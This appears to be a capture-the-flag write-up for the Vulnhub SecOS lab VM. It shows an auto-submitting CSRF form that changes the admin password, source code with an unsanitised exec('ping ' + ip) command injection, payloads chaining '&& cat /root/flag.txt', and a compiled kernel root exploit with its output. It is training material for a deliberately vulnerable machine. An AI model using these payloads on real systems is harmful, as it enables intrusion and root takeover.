Vulnhub SecOS

Environment download: https://www.vulnhub.com/entry/secos-1,88/

Environment setup

No OVF file is provided here, only a vmdk file, so to set up the environment you create a new virtual machine and attach the disk.

Walkthrough

I first scanned the /24 with zenmap and found the target machine.

Visit port 8081.

Register an account and log in as usual, then look for places that might be vulnerable.

When I saw this page

I thought there would be an authorization bypass that lets me change spiderman's password, but there wasn't. Next, in the front-end code's comments I found

<!--<li><a href="/hint">Wanna help?</a></li>!-->

So there is a hint page; visiting it I found

First: the admin visits the website (really) frequently
Second: He runs it locally, on 127.0.0.1.
Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough

So this can be combined with the change password function above to carry out a CSRF attack. The poc.html can be generated with Burp Suite.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://192.168.56.101:8081/change-password" method="POST">
<input type="hidden" name="password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

That is the code it generates, but it requires a click, so modify it:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form name="change" action="http://127.0.0.1:8081/change-password" method="POST">
<input type="hidden" name="password" value="p0desta" />
</form>
<script type="text/javascript">
document.change.submit();
</script>
</body>
</html>

Start a PHP server locally so that this page can be reached, and then:

After sending it, wait a moment and the password will be changed to p0desta; log in.

Privilege escalation

Privilege escalation, method one

Connect over SSH with this password (the tool I used is MobaXterm). Under /home I found

spiderman@SecOS-1:/$ cd home
spiderman@SecOS-1:/home$ ls
secosadmin spiderman
spiderman@SecOS-1:/home$ cd spiderman
spiderman@SecOS-1:~$ ls
tmp vnwa
spiderman@SecOS-1:~$ cd vnwa
spiderman@SecOS-1:~/vnwa$ ls
internalServer.js lib LICENSE node_modules package.json public scripts server.js views
spiderman@SecOS-1:~/vnwa$ cat internalServer.js
var fs = require('fs');
var express = require('express');
var http = require('http');
var sys = require('sys')
var exec = require('child_process').exec;
var crypto = require('crypto');

var utils = require('./lib/utils.js');
var model = require('./lib/model.js');

var app = express();
var server = http.createServer(app);

var logger = function (req, res, next) {
    console.log(req.connection.remoteAddress + " tried to access : " + req.url);
    next(); // Passing the request to the next handler in the stack.
}

// Configuration
app.configure(function () {
    // Session management
    app.use(express.cookieParser());
    app.use(express.session({secret: 'privateKeyForSession'}));
    app.use("/js", express.static(__dirname + '/public/js')); // javascript folder
    app.use("/css", express.static(__dirname + '/public/css')); // javascript folder

    app.set('views', __dirname + '/views'); // views folder
    app.set('view engine', 'ejs'); // view engine for this projet : ejs

    app.use(express.bodyParser()); // for POST Requests
    app.use(logger); // Here you add your logger to the stack.
    app.use(app.router); // The Express routes handler.
});


app.get('/', function (req, res) {
    res.render('ping.ejs', {
        isConnected: req.session.isConnected,
        isAdmin: req.session.isAdmin
    });
});

// Update password
app.post('/', function (req, res) {
    ip = req.body.ip
    if (ip == "") {
        utils.redirect(req, res, '/ping-status');
    } else {
        // getting the command with req.params.command
        var child;
        // console.log(req.params.command);
        child = exec('ping ' + ip, function (error, stdout, stderr) {
            res.render('ping.ejs', {
                isConnected: req.session.isConnected,
                message: stdout,
                isAdmin: req.session.isAdmin
            });
        });
    }
});

server.listen(9000, '127.0.0.1', function() {
    console.log("Listening on port 9000");
});

There is a service started on port 9000:

spiderman@SecOS-1:~/vnwa$ ps -aux | grep inter
root 1025 0.0 0.1 4692 1068 ? Ss 08:58 0:00 sudo -u root sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
root 1028 0.0 0.0 2268 488 ? S 08:58 0:00 sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
root 1029 0.0 1.5 78144 16144 ? Sl 08:58

It runs as root. For convenience during testing, forward the port out:

ssh -L localhost:2000:localhost:9000 spiderman@192.168.56.101

See this article for reference: https://blog.fundebug.com/2017/04/24/ssh-port-forwarding/

Now visiting local port 2000 reaches the service on the target's port 9000.

A quick look at the code shows a command injection vulnerability here: the user-supplied ip is concatenated straight into the shell command exec('ping ' + ip).

127.0.0.1 -c 1 && ls

The -c 1 is added because on Linux the ping command does not stop on its own, so the response would never be rendered.

This also confirms it is running as root, so the flag can be read directly.

127.0.0.1 -c 1 && cat /root/flag.txt

Of course you could also get a shell from it; I won't go into detail.


Privilege escalation, method two

spiderman@SecOS-1:~/vnwa$ uname -a
Linux SecOS-1 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 i686 i686 i686 GNU/Linux
spiderman@SecOS-1:~/vnwa$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04 LTS
Release: 14.04
Codename: trusty

A privilege escalation exploit for this kernel can be found with a Google search: https://www.exploit-db.com/exploits/37292/

spiderman@SecOS-1:~/vnwa$ ls
exploit.c lib node_modules public server.js
internalServer.js LICENSE package.json scripts views
spiderman@SecOS-1:~/vnwa$ gcc exploit.c -o exploit
spiderman@SecOS-1:~/vnwa$ ls
exploit internalServer.js LICENSE package.json scripts views
exploit.c lib node_modules public server.js
spiderman@SecOS-1:~/vnwa$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# ls
LICENSE exploit.c lib package.json scripts views
exploit internalServer.js node_modules public server.js
# cd /root
# ls
flag.txt
# cat flag.txt
Hey,

Congrats, you did it !

The flag for this first (VM) is: MickeyMustNotDie.
Keep this flag because it will be needed for the next VM.

If you liked the Web application, the code is available on Github.
(https://github.com/PaulSec/VNWA)

There should be more VMs to come in the next few weeks/months.

Twitter: @PaulWebSec
GitHub : PaulSec